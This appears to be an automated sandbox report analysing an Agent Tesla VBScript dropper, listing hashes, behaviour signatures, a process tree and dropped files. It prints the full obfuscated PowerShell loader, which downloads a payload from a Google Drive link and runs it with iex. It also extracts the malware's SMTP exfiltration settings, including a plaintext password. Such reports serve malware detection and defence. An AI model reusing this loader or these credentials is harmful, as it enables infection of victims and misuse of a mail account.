Analysis
-
max time kernel
147s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
08-05-2024 09:26
General
-
Target
STOPA 2024-0181.vbs
-
Size
10KB
-
MD5
420b31e03f0aac291050345120dbb1c8
-
SHA1
e0968e51e1f6d8f3335ef9b9d5dea2c3f2253079
-
SHA256
9cec82087a35cfbb1b0097af9f6113b80cdbcdf9c73383a412dbf8408f37dfeb
-
SHA512
b5d3d8a5fc03ffb54a166b30f4bcdb1073fbdc08df5013b170321199f1939de630f596d058f44a5c4d9bae8f7f3130a6cd3b1d5a11d7f1d9753aee926f0dd7ac
-
SSDEEP
192:LIOoWa+tZFy6AA+1WHfa1vD7nSruBun2mF:LmW7y6AASOE7nSr0uBF
Score
10/10
Malware Config
Extracted
Family
agenttesla
Credentials
Protocol: smtp- Host:
mail.blachownia.pl - Port:
587 - Username:
[email protected] - Password:
Zamowienia-2017 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 3 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 20 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\STOPA 2024-0181.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Smaabarns = 1;$Cutleriaceous='Su';$Cutleriaceous+='bstrin';$Cutleriaceous+='g';Function Sanktionspolitik($Hematospectrophotometer){$Konsistoriemedlem=$Hematospectrophotometer.Length-$Smaabarns;For($Nedblndinger=1;$Nedblndinger -lt $Konsistoriemedlem;$Nedblndinger+=2){$Afgrnsnings+=$Hematospectrophotometer.$Cutleriaceous.Invoke( $Nedblndinger, $Smaabarns);}$Afgrnsnings;}function Recours($Acuating){& ($Vsentlighedskriteriernes) ($Acuating);}$Sues=Sanktionspolitik 'SM oFzbi lDl a,/V5P.s0 ,(SW i nbdEoSw s ANBTC O1U0 .,0 ;c TW i n 6.4M;, Ox,6T4C;. SrSv : 1R2M1A.T0 )R UGOe cDk oT/B2t0L1s0 0P1.0E1R HF,i rBeOfSoAxn/.1 2H1 .,0, ';$Konomimnstret=Sanktionspolitik 'SU s.e.r.- ADg e n,tH ';$Lugtesans=Sanktionspolitik 'Wh tUtSpDs :U/ /.d rSi,v.e..Rg o o.g l,e . c,oPmS/Bu c,?TeNx p o.rBt =AdpoSw nFlSo.aOd & iAdU=P1SA xNSIgHx,zSnDh O,1AxW7.q U 1Tb 1.bS1PL.3Fe.hGNaULE LPOAPUgJpSL ';$Bloodstones=Sanktionspolitik 'A>C ';$Vsentlighedskriteriernes=Sanktionspolitik 'hiCe xc ';$Pedler='Konferensers206';Recours (Sanktionspolitik 'JS.eItM-WC o n tSe.nVt, ,-.PbaLtGhC GTR:,\EX eLnVoKfMoSb.i s k eV.,tAx.t. P-MVPaQlIuDeS $.PPe,d lVeBrU;R ');Recours (Sanktionspolitik 'Oi fF ,(Bt e s tU-.pTaStWhI ,T :.\SX ePnMo,f.o.bMirsDkTe .,t xltN).{,e x,iAtV} ;S ');$Bogtilrettelgger = Sanktionspolitik ',eUc h.o .%Ka,p.pTd a.t.a %T\RF uBdEg y . SFyFn &A&T eIcDhHo T$. ';Recours (Sanktionspolitik 'd$ gUlFoObmaTlP:CCAa.f,eFt,ePa.t,rEeOs =.(RcFm,dS L/OcS A$TB oSgUt iOl rte tUt e.ltg g.eorS)l ');Recours (Sanktionspolitik 'B$.g,l oMb,aRl,: uTn,c,r.u.sKtmeEdS= $.LNuEg.tOe.sLa,n.s . sRprl.iCt.( $.B.lIo oCdSsBtFoCnSe.s ). ');$Lugtesans=$uncrusted[0];Recours (Sanktionspolitik 'B$ g.l.o b a l,:tF u s o.i.d = N.e,wA- OFbFjSeMcHt. LS.yDsTt eEm,.ANTeDtD.FW eSbGC,lSiPe.n,t ');Recours (Sanktionspolitik 'I$,FRuGs,o.i d . HIeDaEd e r s [,$ K o nNoDmci m.n s.tGrSe t ]M=S$ SUuNe s ');$Cloche=Sanktionspolitik ' FEu sEoli.d . DSoNwPn l.o,aAdBFUi l.e (H$dLPuDg.tBeBs.a n.sF, $DUknStWr aLvIe.l eBdO), ';$Cloche=$Cafeteatres[1]+$Cloche;$Untraveled=$Cafeteatres[0];Recours (Sanktionspolitik 'H$ gDl oPb,a ld:uCIa l i cIu.lCa.tBe.1.7B1M=,( TSeGsDt -BPTaDt hF $ UUn.t r,a.v.eElBe dH) ');while (!$Caliculate171) {Recours (Sanktionspolitik ' $.gBlEoRb a l,:LO p.t.iUcLsT=U$ tSr uFe ') ;Recours $Cloche;Recours (Sanktionspolitik 'VSPtOaIr t -GSKl e eBpO A4 ');Recours (Sanktionspolitik 'B$,g lOoPbVaAlR: CBa,l.iTcRuWl aHt e.1,7 1 =K(cT e sMt - P.aEt hE S$SU.nLt r a vHeSlUeFdF), ') ;Recours (Sanktionspolitik 'F$Rg,lSo b a lS:SC u v,i,e.r iTaTnB=.$,g l,oOb aIlP: A m pUeHrSsMaFnSdSsA1,5L3 +b+,%S$ u n cerhu.s.tOe d .Dc.o uMn.tU ') ;$Lugtesans=$uncrusted[$Cuvierian];}$Equalisations=322933;$Trakkasseres=26388;Recours (Sanktionspolitik 'T$PgClCo bsa lK:LAtf g a nUg s.pPeRrRrDoIn e.r n.e.sH I=f aG.eCt,-AC,o n tbeDnDt S$IU n,t,rGa v.e.l eAd. ');Recours (Sanktionspolitik 'R$BgJlTo b,a.lN: ANn eLcNhTo iDcU1 9O6 =D [NSIyEsKt eOm .,Cao,nMv e r t ] :S: FKr o.mSBUa s e 6,4.S tTrUi nMgS(O$AA fMg a,n gMssp eSrSr o nAeFrNn,eBs )F ');Recours (Sanktionspolitik ',$ gBl oEbRaSlE: F o.l kNe p.e n.s itohn sRaAl d,e r,eVnBsU M=T .[sS.yNsGt eOm,.,T.e x.tT.BE n.c o.dFi,n gR]R:T: A S C,I,I . G eAt S t r i,nIg,(.$ ABn e c h.osiMc,1 9.6,)d ');Recours (Sanktionspolitik 'F$ g lPorb a.lS:kGceCnGo pSlDi,v n iAn g.e rIn e =R$PF.oHlFk e.p eUnBs i.o n,s.aFl dTeOr eCn sU.Rs.u.b s tRr.i,n gU(R$ EAq,u a.lFiTs,aTt iUoSn s,,.$STPr a,kTkDaDs sSe,rPe sF), ');Recours $Genoplivningerne;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fudgy.Syn && echo $"3⤵
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Smaabarns = 1;$Cutleriaceous='Su';$Cutleriaceous+='bstrin';$Cutleriaceous+='g';Function Sanktionspolitik($Hematospectrophotometer){$Konsistoriemedlem=$Hematospectrophotometer.Length-$Smaabarns;For($Nedblndinger=1;$Nedblndinger -lt $Konsistoriemedlem;$Nedblndinger+=2){$Afgrnsnings+=$Hematospectrophotometer.$Cutleriaceous.Invoke( $Nedblndinger, $Smaabarns);}$Afgrnsnings;}function Recours($Acuating){& ($Vsentlighedskriteriernes) ($Acuating);}$Sues=Sanktionspolitik 'SM oFzbi lDl a,/V5P.s0 ,(SW i nbdEoSw s ANBTC O1U0 .,0 ;c TW i n 6.4M;, Ox,6T4C;. SrSv : 1R2M1A.T0 )R UGOe cDk oT/B2t0L1s0 0P1.0E1R HF,i rBeOfSoAxn/.1 2H1 .,0, ';$Konomimnstret=Sanktionspolitik 'SU s.e.r.- ADg e n,tH ';$Lugtesans=Sanktionspolitik 'Wh tUtSpDs :U/ /.d rSi,v.e..Rg o o.g l,e . c,oPmS/Bu c,?TeNx p o.rBt =AdpoSw nFlSo.aOd & iAdU=P1SA xNSIgHx,zSnDh O,1AxW7.q U 1Tb 1.bS1PL.3Fe.hGNaULE LPOAPUgJpSL ';$Bloodstones=Sanktionspolitik 'A>C ';$Vsentlighedskriteriernes=Sanktionspolitik 'hiCe xc ';$Pedler='Konferensers206';Recours (Sanktionspolitik 'JS.eItM-WC o n tSe.nVt, ,-.PbaLtGhC GTR:,\EX eLnVoKfMoSb.i s k eV.,tAx.t. P-MVPaQlIuDeS $.PPe,d lVeBrU;R ');Recours (Sanktionspolitik 'Oi fF ,(Bt e s tU-.pTaStWhI ,T :.\SX ePnMo,f.o.bMirsDkTe .,t xltN).{,e x,iAtV} ;S ');$Bogtilrettelgger = Sanktionspolitik ',eUc h.o .%Ka,p.pTd a.t.a %T\RF uBdEg y . SFyFn &A&T eIcDhHo T$. ';Recours (Sanktionspolitik 'd$ gUlFoObmaTlP:CCAa.f,eFt,ePa.t,rEeOs =.(RcFm,dS L/OcS A$TB oSgUt iOl rte tUt e.ltg g.eorS)l ');Recours (Sanktionspolitik 'B$.g,l oMb,aRl,: uTn,c,r.u.sKtmeEdS= $.LNuEg.tOe.sLa,n.s . sRprl.iCt.( $.B.lIo oCdSsBtFoCnSe.s ). ');$Lugtesans=$uncrusted[0];Recours (Sanktionspolitik 'B$ g.l.o b a l,:tF u s o.i.d = N.e,wA- OFbFjSeMcHt. LS.yDsTt eEm,.ANTeDtD.FW eSbGC,lSiPe.n,t ');Recours (Sanktionspolitik 'I$,FRuGs,o.i d . HIeDaEd e r s [,$ K o nNoDmci m.n s.tGrSe t ]M=S$ SUuNe s ');$Cloche=Sanktionspolitik ' FEu sEoli.d . DSoNwPn l.o,aAdBFUi l.e (H$dLPuDg.tBeBs.a n.sF, $DUknStWr aLvIe.l eBdO), ';$Cloche=$Cafeteatres[1]+$Cloche;$Untraveled=$Cafeteatres[0];Recours (Sanktionspolitik 'H$ gDl oPb,a ld:uCIa l i cIu.lCa.tBe.1.7B1M=,( TSeGsDt -BPTaDt hF $ UUn.t r,a.v.eElBe dH) ');while (!$Caliculate171) {Recours (Sanktionspolitik ' $.gBlEoRb a l,:LO p.t.iUcLsT=U$ tSr uFe ') ;Recours $Cloche;Recours (Sanktionspolitik 'VSPtOaIr t -GSKl e eBpO A4 ');Recours (Sanktionspolitik 'B$,g lOoPbVaAlR: CBa,l.iTcRuWl aHt e.1,7 1 =K(cT e sMt - P.aEt hE S$SU.nLt r a vHeSlUeFdF), ') ;Recours (Sanktionspolitik 'F$Rg,lSo b a lS:SC u v,i,e.r iTaTnB=.$,g l,oOb aIlP: A m pUeHrSsMaFnSdSsA1,5L3 +b+,%S$ u n cerhu.s.tOe d .Dc.o uMn.tU ') ;$Lugtesans=$uncrusted[$Cuvierian];}$Equalisations=322933;$Trakkasseres=26388;Recours (Sanktionspolitik 'T$PgClCo bsa lK:LAtf g a nUg s.pPeRrRrDoIn e.r n.e.sH I=f aG.eCt,-AC,o n tbeDnDt S$IU n,t,rGa v.e.l eAd. ');Recours (Sanktionspolitik 'R$BgJlTo b,a.lN: ANn eLcNhTo iDcU1 9O6 =D [NSIyEsKt eOm .,Cao,nMv e r t ] :S: FKr o.mSBUa s e 6,4.S tTrUi nMgS(O$AA fMg a,n gMssp eSrSr o nAeFrNn,eBs )F ');Recours (Sanktionspolitik ',$ gBl oEbRaSlE: F o.l kNe p.e n.s itohn sRaAl d,e r,eVnBsU M=T .[sS.yNsGt eOm,.,T.e x.tT.BE n.c o.dFi,n gR]R:T: A S C,I,I . G eAt S t r i,nIg,(.$ ABn e c h.osiMc,1 9.6,)d ');Recours (Sanktionspolitik 'F$ g lPorb a.lS:kGceCnGo pSlDi,v n iAn g.e rIn e =R$PF.oHlFk e.p eUnBs i.o n,s.aFl dTeOr eCn sU.Rs.u.b s tRr.i,n gU(R$ EAq,u a.lFiTs,aTt iUoSn s,,.$STPr a,kTkDaDs sSe,rPe sF), ');Recours $Genoplivningerne;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fudgy.Syn && echo $"4⤵
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
Filesize
344B
MD5ab8a93787bc207ae4734c8390ac57ac1
SHA11f85782173b0a9a243e93a15e5a6dd1e4ccd3702
SHA25618154d6421a2a7d1bbf96cdf619dbeb1bbe8eea295afee55a7fae8ec8b9c132e
SHA512ceabcd516c66e717dc4bcf26ede24fb99410692609ad625ad91980c7c1720abbcef4f01c57203590d2904f741f3a5ec599bb4ca2f8d6c2df975be252fe34207d
-
Filesize
454KB
MD5fc62b80e164b7026eac50c83ad55770e
SHA10cd849e2fa77e57d94ebe8c5b7685474e2438e48
SHA256473ff96f43544f04cb08a9e6faa4a72162ebd8e93363cb82cdd914f34eb38f1c
SHA512924b368df010aecca6d7efb572ab0a8d7a5afaacb3c12b94877f0606efe113184180fdf47067d00004f49297c3978054abc0980b51c04b8e145d9e276041c8de
-
Filesize
7KB
MD5071bf2049225383809e1429148d20e15
SHA104795e2601eeab2d1621fb8854cc6275138f12c9
SHA25609f6094e33ac7fd8c2d9185fb470cf3ab01e428b266e39730f24ffe29b25f8f3
SHA5120ba13af42e23e4846770f7d3497dabacfd99105eae9d34acec4246bbc6c07acdca952f81257eeae410834b9dd50cf58a9653c458d44d686e639374b68679ca2c
-
Filesize
264KB
-
Filesize
16.4MB
-
Filesize
29.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
2.9MB